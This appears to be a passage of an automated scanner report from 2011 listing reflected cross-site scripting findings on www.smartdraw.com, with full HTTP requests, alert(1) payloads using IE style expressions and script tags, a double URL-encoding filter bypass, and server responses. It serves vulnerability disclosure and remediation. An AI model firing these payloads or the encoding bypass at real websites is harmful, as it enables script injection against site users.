The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396ed"style%3d"x%3aexpression(alert(1))"eac095684e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 396ed"style="x:expression(alert(1))"eac095684e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /support/x22?396ed"style%3d"x%3aexpression(alert(1))"eac095684e0=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:49 GMT Content-Length: 8781 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/ Set-Cookie: ASP.NET_SessionId=2smue255v4gtmz55m2l3rh45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.199. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/support/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79e74"style="x:expression(alert(1))"af3d991af1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /support/x22?79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=oc0z2245wuz2afzvjdfzixel; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b was submitted in the REST URL parameter 1. This input was echoed as 68b35"style="x:expression(alert(1))"d2a8b1b996b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1y4wau550cpob2bb3amrf145; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321 was submitted in the REST URL parameter 1. This input was echoed as fc351"style="x:expression(alert(1))"46b2268b321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:59 GMT Content-Length: 8711 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=twmrveyjx5im0l30e30blh45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec was submitted in the REST URL parameter 2. This input was echoed as 5fc3f"style="x:expression(alert(1))"219d68a09ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training/5fc3f%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522219d68a09ec HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:10 GMT Content-Length: 8746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=wufgse55k2kojwaw3jekff45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc was submitted in the REST URL parameter 2. This input was echoed as f20b1"style="x:expression(alert(1))"35c6b1442fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /training/x22f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:30:06 GMT Content-Length: 8767 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/ Set-Cookie: ASP.NET_SessionId=b52255als5xnh545vc0uboia; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:30:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.204. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/training/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccf51"style="x:expression(alert(1))"a72e20bf002 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /training/x22?ccf51"style%3d"x%3aexpression(alert(1))"a72e20bf002=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=fd1day3lcgnbupjb3jzkvr55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.205. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/training/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4b27"style="x:expression(alert(1))"b6d7f14376 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /training/x22?e4b27"style%3d"x%3aexpression(alert(1))"b6d7f14376=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=4jdjcurlf30fkz4530xla555; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 was submitted in the REST URL parameter 3. This input was echoed as 20ea8"style="x:expression(alert(1))"ea712677564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/index.htm20ea8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ea712677564 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:55 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ioghgr45ccy40ubwykcs3pan; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa was submitted in the REST URL parameter 3. This input was echoed as d00fd"style="x:expression(alert(1))"37b4fa705aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/d00fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252237b4fa705aa HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=iffsvl2yty0fiq3algupkl55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8767 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31 was submitted in the REST URL parameter 3. This input was echoed as 7ebb1"><script>alert(1)</script>7f63dfd6d31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/index.htm7ebb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7f63dfd6d31?id=340836/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=yawesm55knbvl4mobfmyjr2e; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8921 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b was submitted in the REST URL parameter 3. This input was echoed as 579d3"><script>alert(1)</script>136f2be723b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/demo/579d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e136f2be723b?id=340836/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:57 GMT Content-Length: 8928 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/ Set-Cookie: ASP.NET_SessionId=fzzorg45tqhtbe455jbn02zs; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c was submitted in the REST URL parameter 1. This input was echoed as 81e6e"style="x:expression(alert(1))"30c796e241c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos81e6e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252230c796e241c/demo/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=vgiqbgv2pky1le45ukty4wfj; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17 was submitted in the REST URL parameter 1. This input was echoed as 3f3f7"style="x:expression(alert(1))"704a7a40d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /3f3f7%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522704a7a40d17/demo/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:51 GMT Content-Length: 8746 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: ASP.NET_SessionId=wupmsxznbmovt155mvmvxh45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a was submitted in the REST URL parameter 2. This input was echoed as 2addd"style="x:expression(alert(1))"108d415c1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /videos/2addd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522108d415c1a/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ra0kk255lzz14izejoevse45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca5b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221a726fc0e8 was submitted in the REST URL parameter 2. This input was echoed as 5ca5b"style="x:expression(alert(1))"1a726fc0e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
